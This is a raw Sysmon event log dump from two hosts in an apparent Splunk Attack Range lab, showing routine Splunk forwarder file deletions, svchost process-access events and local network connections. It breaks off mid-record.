23542300x8000000000000000290946Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:21:11.829{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=05B40CE85AEB2B6028DDF48F1CFA39AF,SHA256=EC983CF9DE57317EC03504CC1C039F41D1DD659E13210C33F62E1885AC299DA0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000439524Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:21:11.618{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8429A91B05AE3F832A294569EBADD68A,SHA256=DEC52E1D50D4671A55137B9485DEC6E26E6DCD13C454B5F12DF7B7C51A894E6F,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000439523Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:21:11.024{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DA-6086-0B05-00000000BA01}4936C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000439522Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:21:11.024{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DB-6086-0C05-00000000BA01}4248C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000439527Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:21:12.850{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8ACB277B91691AE60884EF9FD476ADEA,SHA256=1C42C5749D470F25E15F61D1ED09B06A10C6D1FF300D97A6D5375A73D3DE5AE9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000290947Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:21:12.833{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=41DF5C8E7AA75DF762DEF9D773C239B0,SHA256=BADEE0E67C226CB780BD8DC8D13079107060CB13ECA5CEA905B45487390BCC28,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000439526Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:21:12.025{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DA-6086-0B05-00000000BA01}4936C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000439525Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:21:12.025{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DB-6086-0C05-00000000BA01}4248C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000290948Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:21:13.837{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BF10C5E3BE5934F70BAB0616FB86A5E6,SHA256=FDA7EA86DD0C66852F97FD85386AC615638B9F3651F0793DEA85DF8CCC990196,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000439530Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:21:13.060{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=0E907B4687D3ACE9042A52D2E575FF9C,SHA256=AD03A20EFB0F69E5899B684BB2C5A102F4E114D2D2B7BC255555D3201D9C624B,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000439529Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:21:13.026{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DA-6086-0B05-00000000BA01}4936C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000439528Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:21:13.026{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DB-6086-0C05-00000000BA01}4248C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000290953Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:21:14.854{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F83B42EA2F215D89DC1C05FA2DBE3B85,SHA256=48BC57C1998D81A0327D2338C79891BBB5473E8ABC5EA8BCA62BD19BA28E3EBF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000290952Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:21:14.854{BEA10069-D0C2-6086-1300-00000000BB01}344NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive1.datMD5=E495CDC2CCA665E40B183055BF132ACC,SHA256=C25A5CB7D9A67F4A2495E4E1A4B9C598D357DDBEE85AF7A7AF8030CBAAA16D99,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000439535Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:21:10.280{42DC5269-CE8E-6086-0100-00000000BA01}4SystemNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.255-138netbios-dgmfalse10.0.1.14win-dc-932.attackrange.local138netbios-dgm 354300x8000000000000000439534Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:21:10.280{42DC5269-CE8E-6086-0100-00000000BA01}4SystemNT AUTHORITY\SYSTEMudptruefalse10.0.1.14win-dc-932.attackrange.local138netbios-dgmfalse10.0.1.255-138netbios-dgm 23542300x8000000000000000439533Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:21:14.057{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D5DB1EBB9438DDFBCCC0E355C7279DB6,SHA256=FD99C04FDDB306D1CE7DBF39523E57692C4CD682FFCFB579EE19211AAEDE8884,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000290951Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:21:12.411{BEA10069-D145-6086-C700-00000000BB01}2620C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-96.attackrange.local50585-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 23542300x8000000000000000290950Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:21:14.134{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=5E9072E759B11458B49C08778B8D15E9,SHA256=34EEDB9660025D8B125CABA10AF4887EEFFD0DE4A426D996119BA06C63D4498F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000290949Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:21:14.133{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=C6C087069083424C1F508CF243D1BF99,SHA256=3E72FBEE313F33A14BA072650DFE88A457E698D5898C897600D2171E33BE711C,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000439532Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:21:14.027{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DA-6086-0B05-00000000BA01}4936C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000439531Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:21:14.027{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DB-6086-0C05-00000000BA01}4248C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000290954Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:21:15.887{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C63447CB136F707100A1FEC457E5F047,SHA256=1CEA7046A93CB20AADD6F683C29AA58C573468819354825114FF1D96867D4E7B,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000439540Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:21:12.625{42DC5269-CF43-6086-D800-00000000BA01}4100C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-932.attackrange.local62363-false10.0.1.12-8000- 23542300x8000000000000000439539Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:21:15.289{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=418A14579D5CEE64A7717B0213F63CA4,SHA256=117343CC239E5D06893E0A34D6207AADA11A942F3EE425B8508A672F8F7B2EF6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000439538Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:21:15.189{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=2B6866AAEE4354076823B735D0E4110C,SHA256=CCBEE4CDC117762134095755E78BD761EADB8945FB02A92590E482DB08F5E0A8,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000439537Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:21:15.028{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DA-6086-0B05-00000000BA01}4936C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000439536Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:21:15.028{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DB-6086-0C05-00000000BA01}4248C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000290955Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:21:16.905{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0619D3389B8C4B3BEFA3F1B59AC9A164,SHA256=A67A6A52A48161BA20F5256C1760D16DDDA4405442170A26A0EC4855D0F00700,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000439543Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:21:16.294{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B378F67E8860CFC8E70F0678E227B3B7,SHA256=278E3E883081E8E160BBC962496DE089466F0D6D97AC2CDE4BAEE2E9C9D2C519,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000439542Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:21:16.029{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DA-6086-0B05-00000000BA01}4936C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000439541Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:21:16.029{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DB-6086-0C05-00000000BA01}4248C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000290956Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:21:17.907{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0AB4325D0C4C91250E22F32523DC8C97,SHA256=AE8856302D50F17226F20C2C8452485D6D32497745BB9CDB69CDF3725C7601F0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000439546Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:21:17.304{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DBC0F853633A604933D749948803E558,SHA256=B7CE00931B7FE6374E998C3C9513C01C1FD775871F7B98DB72C54A176AEDF192,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000439545Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:21:17.030{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DA-6086-0B05-00000000BA01}4936C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000439544Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:21:17.030{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DB-6086-0C05-00000000BA01}4248C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000290957Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:21:18.944{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1F27AAC7C29A3A7E28ECAD7505391472,SHA256=065A5B3595A7C1847E8C763A77B74E161049F24CCD311D79C728C78B582FFFEE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000439549Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:21:18.314{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0A32148AAA38F21D26F0897CF6B9DC71,SHA256=5B548302D0948123B83EB7B637F847BDB8747E5725F6C85205AA0F82B5846488,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000439548Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:21:18.031{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DA-6086-0B05-00000000BA01}4936C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000439547Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:21:18.031{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DB-6086-0C05-00000000BA01}4248C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000290958Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:21:19.946{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F2DD535B4A1A86937F7E36D429D3196F,SHA256=92AFC52591BEE7B9A79572EA379A53CD6150E9FA109189F91D83A05AB940B5DE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000439552Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:21:19.324{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7F685FF91AEACA4A08A22ABF900A3D2F,SHA256=70D2134E7A2D9B55E01D4590AA210E61251D82F447DCF2A7885BA9F520D3FC30,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000439551Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:21:19.032{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DA-6086-0B05-00000000BA01}4936C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000439550Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 